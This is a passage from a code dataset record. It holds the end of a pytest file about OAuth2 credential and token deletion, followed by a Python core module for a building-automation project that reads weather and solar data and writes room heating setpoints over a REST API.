match=expected_message):\n db_session.flush()\n\n def test_deleting_an_OAuth2Credentials_deletes_all_its_OAuth2AccessTokens(self,\n db_session,\n factories):\n credentials = factories.OAuth2Credentials()\n db_session.add_all([\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n ])\n db_session.flush()\n\n db_session.delete(credentials)\n db_session.commit()\n\n assert db_session.query(OAuth2AccessToken).all() == []\n","sub_path":"tests/lti/models/test_oauth2_credentials.py","file_name":"test_oauth2_credentials.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"199835618","text":"###\n### Core module for Digi-Salama Assemblin project.\n### \n###\nfrom client import Client\nfrom datetime import datetime, timedelta\nfrom config import config # configparser\nimport config as CONFIG # access to globals\nfrom glob import glob\nimport input_functions\nimport json\nimport csv\nimport time\nimport threading\nimport os\nimport logging\nfrom algorithms import calculate_setpoint, turn_on_heating\n\nROOM_SETPOINT = \"B4023 Room Setpoint Remote\"\nROOM_TEMPERATURE = \"B4023 Room Temperature\"\nSOLAR_POWER = \"Solar Power External\"\nOUTSIDE_TEMPERATURE = \"Outside Temperature External\"\nAIR_TEMPERATURE = \"B4023 Room Temperature\"\n\n# Core class used to start and control subprocesses:\n# - reading data from FMI\n# - writing temp/solar to REST\n# - reading data from REST\n# - writing setpoint to REST\n# Each subprocess runs in its own thread parallel to others.\nclass Core:\n def __init__(self):\n self._solar_data = None\n self._temperature_data = None\n self._client = Client()\n self._starttime = None\n self._endtime = None\n self._reading_REST = read_REST(self._client, self)\n self._reading_FMI = read_FMI(self)\n self._writing_setpoint = write_setpoint(self._client, self)\n self._writing_data = write_data(self._client, self)\n self._save_temperatures = config.getboolean(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SAVE_TEMPERATURES, \\\n fallback=CONFIG.GENERAL_SAVE_TEMPERATURES_FALLBACK)\n self._save_temperatures_filename = config.get(CONFIG.GENERAL_CATEGORY, \\\n CONFIG.GENERAL_SAVE_TEMPERATURES_FILENAME, \\\n fallback=CONFIG.GENERAL_SAVE_TEMPERATURES_FILENAME_FALLBACK)\n\n def stop(self):\n self._reading_REST.stop()\n self._reading_FMI.stop()\n self._writing_setpoint.stop()\n self._writing_data.stop()\n trends = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_TRENDS, \\\n fallback=CONFIG.GENERAL_TRENDS_FALLBACK)\n self._endtime = datetime.now()\n\n # only retrieve trends if the program has ran at least 5 minutes, else might end up with a timeout error.\n if ((self._endtime - self._starttime).total_seconds() > 300 and len(trends) > 0):\n trends = trends.split(\",\")\n self._save_trends(trends)\n\n # Retrieves trends from REST and saves each into its own file\n def _save_trends(self, trends : list):\n logging.info(\"Saving trends: \" + str(trends))\n try:\n trend_data = json.loads(self._client.trends_values(self._starttime, self._endtime, trends))\n for trend in trend_data:\n filename = \"trends_\" + trend['name'] + \".csv\"\n with open(filename, \"w\") as trend_file:\n for value in trend['values']:\n trend_file.write(value['time'] + \",\" + str(value['value']) + \"\\n\")\n except Exception as e:\n logging.error(\"Saving trends error\")\n logging.error(str(e))\n \n\n def set_temperatures(self, temperature_data):\n self._temperature_data = temperature_data\n if self._save_temperatures:\n logging.info(\"Saving temperatures to: \" + self._save_temperatures_filename)\n save_temperatures_to_file(self._solar_data, self._temperature_data, self._save_temperatures_filename)\n\n def get_temperatures(self):\n return self._temperature_data\n\n def set_solar(self, solar_data):\n self._solar_data = solar_data\n\n def get_solar(self):\n return self._solar_data\n\n def start(self):\n # not needed for now.. \n #self._client.login()\n\n #\n # Loading parameters for solar data.\n #\n solar_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FROM_FILE, \\\n fallback=CONFIG.INPUT_SOLAR_FROM_FILE_FALLBACK)\n solar_ilmanet_autodetect = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_ILMANET_AUTODETECT, \\\n fallback=CONFIG.INPUT_SOLAR_ILMANET_AUTODETECT_FALLBACK)\n \n # from a non-Ilmanet datafile\n if solar_from_file:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FILENAME, \\\n fallback=CONFIG.INPUT_SOLAR_FILENAME_FALLBACK)\n date_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_DATE_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_DATE_COLUMN_INDEX_FALLBACK))\n time_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_TIME_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_TIME_COLUMN_INDEX_FALLBACK))\n data_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_DATA_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_SOLAR_DATA_COLUMN_INDEX_FALLBACK))\n logging.info(\"Reading solar data from file: \" + filename + \" date index: \" + str(date_index) + \\\n \" time index: \" + str(time_index) + \" data index: \" + \\\n str(data_index))\n self._solar_data = input_functions.load_data_from_file(filename, date_index, time_index, data_index)\n # Ilmanet\n else:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_ILMANET_FILENAME, \\\n fallback=CONFIG.INPUT_SOLAR_ILMANET_FILENAME_FALLBACK)\n if solar_ilmanet_autodetect:\n try:\n # try to find the newest export_solar... file in the folder\n filename = max(glob(\"export_solar*.csv\"), key = os.path.getmtime)\n logging.info(\"Autodetecting Ilmanet data file: \" + filename)\n except:\n logging.info(\"Failed to autodetect Ilmanet datafile.\")\n logging.info(\"Reading Ilmanet solar data from file: \" + filename)\n self._solar_data = input_functions.get_solar_from_ilmanet(filename)\n\n solar_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_SOLAR_IGNORE_DATES_FALLBACK)\n if solar_ignore_dates:\n logging.info(\"Ignoring dates on solar data\")\n self._solar_data = input_functions.replace_dates_with_today(self._solar_data)\n\n #\n # Loading parameters for temperature data.\n #\n temperatures_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FROM_FILE, \\\n fallback=CONFIG.INPUT_TEMP_FROM_FILE_FALLBACK)\n # datafile\n if temperatures_from_file:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FILENAME, \\\n fallback=CONFIG.INPUT_TEMP_FILENAME_FALLBACK)\n date_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_DATE_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_DATE_COLUMN_INDEX_FALLBACK))\n time_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_TIME_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_TIME_COLUMN_INDEX_FALLBACK))\n data_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_DATA_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_DATA_COLUMN_INDEX_FALLBACK))\n logging.info(\"Reading temperatures from file: \" + filename + \" date index: \" + str(date_index) + \\\n \" time index: \" + str(time_index) + \" data index: \" + \\\n str(data_index))\n self._temperature_data = input_functions.load_data_from_file(filename, date_index, time_index, data_index)\n\n temperature_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_TEMP_IGNORE_DATES_FALLBACK)\n if temperature_ignore_dates:\n logging.info(\"Ignoring dates on temperature data\")\n self._temperature_data = input_functions.replace_dates_with_today(self._temperature_data)\n else:\n # FMI\n self._temperature_data = input_functions.get_temperature_data()\n if self._save_temperatures:\n logging.info(\"Saving temperatures to: \" + self._save_temperatures_filename)\n save_temperatures_to_file(self._solar_data, self._temperature_data, self._save_temperatures_filename)\n # start FMI reading subprocess\n self._reading_FMI.start()\n\n # start other subprocesses\n self._reading_REST.start()\n self._writing_setpoint.start()\n #self._writing_data.start()\n self._starttime = datetime.now()\n\n# process for reading data from REST\nclass read_REST:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n \n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_REST_CYCLE, \\\n fallback=CONFIG.TIMINGS_READ_REST_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_REST_OFFSET, \\\n fallback=CONFIG.TIMINGS_READ_REST_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Reading data started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n # Exit here blocks the process from continuing after exit command has been given,\n # but trends are still being retrieved.\n if self._exit:\n break\n\n filename = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_OUTPUT_FILENAME, \\\n fallback=CONFIG.GENERAL_OUTPUT_FILENAME_FALLBACK)\n\n logging.info(\"Reading data from system...\")\n data = self._client.byid_all()\n write_output(filename, data)\n logging.info(\" Reading data complete\")\n\n except Exception as e:\n logging.error(\"Reading data error\")\n logging.error(str(e))\n\n# process for getting data from FMI\nclass read_FMI:\n def __init__(self, core: Core):\n self._exit = False\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_FMI_CYCLE, \\\n fallback=CONFIG.TIMINGS_READ_FMI_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_FMI_OFFSET, \\\n fallback=CONFIG.TIMINGS_READ_FMI_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Reading FMI temperature data started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n logging.info(\"Getting FMI temperature data...\")\n temperature_data = input_functions.get_temperature_data()\n self._core.set_temperatures(temperature_data)\n logging.info(\" Getting FMI temperature data complete\")\n\n except Exception as e:\n logging.error(\"Getting FMI temperature data error\")\n logging.error(str(e))\n\n\n# process for writing data to REST\nclass write_data:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_DATA_CYCLE, \\\n fallback=CONFIG.TIMINGS_WRITE_DATA_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_DATA_OFFSET, \\\n fallback=CONFIG.TIMINGS_WRITE_DATA_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n solar_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_SOLAR_IGNORE_DATES_FALLBACK)\n solar_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FROM_FILE, \\\n fallback=CONFIG.INPUT_SOLAR_FROM_FILE_FALLBACK)\n\n temperatures_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_TEMP_IGNORE_DATES_FALLBACK)\n temperatures_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FROM_FILE, \\\n fallback=CONFIG.INPUT_TEMP_FROM_FILE_FALLBACK)\n \n logging.info(\"Writing temperature and solar started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n solar_data = self._core.get_solar()\n temperature_data = self._core.get_temperatures()\n\n logging.info(\"Writing temperature and solar data to system...\")\n self._process_data(solar_data, temperature_data, temperatures_ignore_dates, temperatures_from_file, \\\n solar_ignore_dates, solar_from_file)\n logging.info(\" Writing temperature and solar data complete\")\n\n except Exception as e:\n logging.error(\"Writing temperature and solar data error\")\n logging.error(str(e))\n\n # writing function\n def _process_data(self, solar_data: list, temperature_data: list, temperatures_ignore_dates: bool, \\\n temperatures_from_file: bool, solar_ignore_dates: bool, \\\n solar_from_file: bool):\n now = datetime.now()\n data = []\n\n if (solar_data != None):\n for row in solar_data:\n if (now.date() == row[0].date() or (solar_ignore_dates and solar_from_file)):\n if (now.hour == row[0].hour):\n data.append((SOLAR_POWER, row[1]))\n break\n \n if (temperature_data != None):\n for row in temperature_data:\n if (now.date() == row[0].date() or (temperatures_ignore_dates and temperatures_from_file)):\n if (now.hour == row[0].hour):\n data.append((OUTSIDE_TEMPERATURE, row[1]))\n break\n\n self._client.writebyid_multiple(data)\n\n# process for writing setpoint\nclass write_setpoint:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n time_horizon = int(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_TIME_HORIZON, \\\n fallback=CONFIG.GENERAL_TIME_HORIZON_FALLBACK))\n setpoint_minimum = float(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SETPOINT_MINIMUM, \\\n fallback=CONFIG.GENERAL_SETPOINT_MINIMUM_FALLBACK))\n setpoint_maximum = float(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SETPOINT_MAXIMUM, \\\n fallback=CONFIG.GENERAL_SETPOINT_MAXIMUM_FALLBACK))\n\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_SETPOINT_CYCLE, \\\n fallback=CONFIG.TIMINGS_WRITE_SETPOINT_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_SETPOINT_OFFSET, \\\n fallback=CONFIG.TIMINGS_WRITE_SETPOINT_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Writing setpoint started - Cycle length: \" + str(cycle_length) + \" min\")\n\n\n heating_off_at_hour = int(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_OFF_AT_HOUR, \\\n fallback=CONFIG.GENERAL_HEATING_OFF_AT_HOUR_FALLBACK))\n heating_is_off = False\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n solar_data = self._core.get_solar()\n temperature_data = self._core.get_temperatures()\n\n logging.info(\"Getting room and air temperature from system...\")\n input_data = list()\n input_data.append(ROOM_TEMPERATURE)\n input_data.append(AIR_TEMPERATURE)\n\n data = json.loads(self._client.byid_multiple(input_data))\n\n room_temperature = float(get_value(data, ROOM_TEMPERATURE))\n air_temperature = float(get_value(data, AIR_TEMPERATURE))\n logging.info(\" Temperatures retrieved, room: \" + str(room_temperature) + \\\n \" air: \" + str(air_temperature))\n \n logging.info(\"Calculating new setpoint...\")\n setpoint = calculate_setpoint(room_temperature, solar_data, temperature_data, \\\n time_horizon, air_temperature)\n logging.info(\" Calculating new setpoint complete: \" + str(setpoint))\n\n if (setpoint < setpoint_minimum):\n setpoint = setpoint_minimum\n elif (setpoint > setpoint_maximum):\n setpoint = setpoint_maximum\n\n output = []\n output.append((ROOM_SETPOINT, setpoint))\n #output.append((\"External Control\", 1))\n\n if (datetime.now().hour == heating_off_at_hour and heating_is_off != True \\\n and is_heating_control_allowed()):\n logging.info(\"Turning heating/cooling external control on.\")\n output.append((\"B4023 Heating Disabled\", 1))\n output.append((\"B4023 Cooling Disabled\", 1))\n #output.append((\"External Control\", 1))\n heating_is_off = True\n\n #if ((is_heating_control_allowed() == True)):\n #output.append((\"External Control\", 1))\n #time.sleep(840)\n\n if (is_heating_control_allowed() != True):\n if (heating_is_off == True):\n logging.info(\"Turning heating/control external control off - outside allowed time range\")\n heating_is_off = False\n output.append((\"B4023 Heating Disabled\", 0))\n output.append((\"B4023 Cooling Disabled\", 0))\n #output.append((\"External Control\", 0))\n\n if (heating_is_off and is_heating_control_allowed() and turn_on_heating( \\\n room_temperature, \\\n solar_data, \\\n temperature_data, \\\n time_horizon, \\\n air_temperature)):\n logging.info(\"Turning heating/control external control off - manual call\")\n heating_is_off = False\n output.append((\"B4023 Heating Disabled\", 0))\n output.append((\"B4023 Cooling Disabled\", 1))\n #output.append((\"External Control\", 0))\n\n logging.info(\"Writing new setpoint to system: \" + str(setpoint))\n self._client.writebyid_multiple(output)\n logging.info(\" Writing new setpoint complete\")\n\n except Exception as e:\n logging.error(\"Writing setpoint error\")\n logging.error(str(e))\n\n\n# return 'value' for target 'id' \ndef get_value(data: list, target: str):\n for i in range(len(data)):\n if (data[i][\"id\"] == target):\n return data[i][\"value\"]\n \n return None\n\n\n# calculates the time for first cycle minus cycle length\ndef calculate_start_time(offset: int, seconds: int):\n starttime = datetime.now()\n\n minutes = 0\n while (starttime.minute >= minutes):\n minutes += offset\n\n minutes -= offset\n return starttime.replace(minute=minutes, second=seconds, microsecond=0)\n\n# sleep until next cycle\ndef delay_process(process_time: datetime, cycle_length: int):\n while (process_time < datetime.now()):\n process_time = process_time + timedelta(minutes=cycle_length)\n\n time.sleep((process_time - datetime.now()).total_seconds())\n return process_time\n\n# saves temperature (and solar) data to a file\n# only used when FMI reading is live\ndef save_temperatures_to_file(solar: list, data: list, filename: str):\n _solar = \"NaN\"\n now = datetime.now()\n\n if (solar != None):\n for row in solar:\n if (now.date() == row[0].date()):\n if (now.hour == row[0].hour):\n _solar = row[1]\n break\n\n # headers\n if not (os.path.exists(filename)):\n with open(filename, \"w\") as data_file:\n data_file.write(\"Date,Record Time,0 Temp Time,Solar Radiation,0 Temp\")\n\n for x in range(len(data) - 1):\n data_file.write(\",+\" + str(x + 1))\n data_file.write(\"\\n\")\n\n with open(filename, \"a\") as data_file:\n data_file.write(data[0][0].strftime(\"%d/%m/%Y\")) # date\n data_file.write(datetime.now().strftime(\",%H:%M:%S\")) # record time\n data_file.write(data[0][0].strftime(\",%H:%M:%S\")) # 0 temp time\n data_file.write(\",\"+_solar)\n\n for x in data:\n data_file.write(\",\" + x[1])\n data_file.write(\"\\n\")\n\n\ndef write_output(filename: str, input_data: str):\n data = json.loads(input_data)\n\n # headers\n if not (os.path.exists(filename)):\n with open(filename, \"w\") as data_file:\n data_file.write(\"Date,Time\")\n for x in range(len(data)):\n data_file.write(\",\" + data[x][\"id\"])\n data_file.write(\"\\n\")\n\n with open(filename, \"a\") as data_file:\n _datetime = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\").split()\n data_file.write(_datetime[0] + \",\" + _datetime[1])\n for x in range(len(data)):\n data_file.write(\",\" + data[x][\"value\"])\n data_file.write(\"\\n\")\n\n\ndef is_heating_control_allowed():\n time_range = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_CONTROL_HOURS, \\\n fallback=CONFIG.GENERAL_HEATING_CONTROL_HOURS_FALLBACK) \\\n .split(\"-\")\n heating_control_allowed = config.getboolean(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_CONTROL_ALLOWED, \\\n fallback=CONFIG.GENERAL_HEATING_CONTROL_ALLOWED_FALLBACK) \n\n current_hour = datetime.now().hour\n start_hour = int(time_range[0])\n end_hour = int(time_range[1])\n\n if (heating_control_allowed):\n if (start_hour == end_hour):\n return True\n elif (current_hour >= start_hour and start_hour > end_hour):\n return True\n elif (current_hour < end_hour and start_hour > end_hour):\n return True\n elif (current_hour >= start_hour and current_hour < end_hour):\n return True\n else:\n return False\n\n","sub_path":"project_B4023/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":25654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}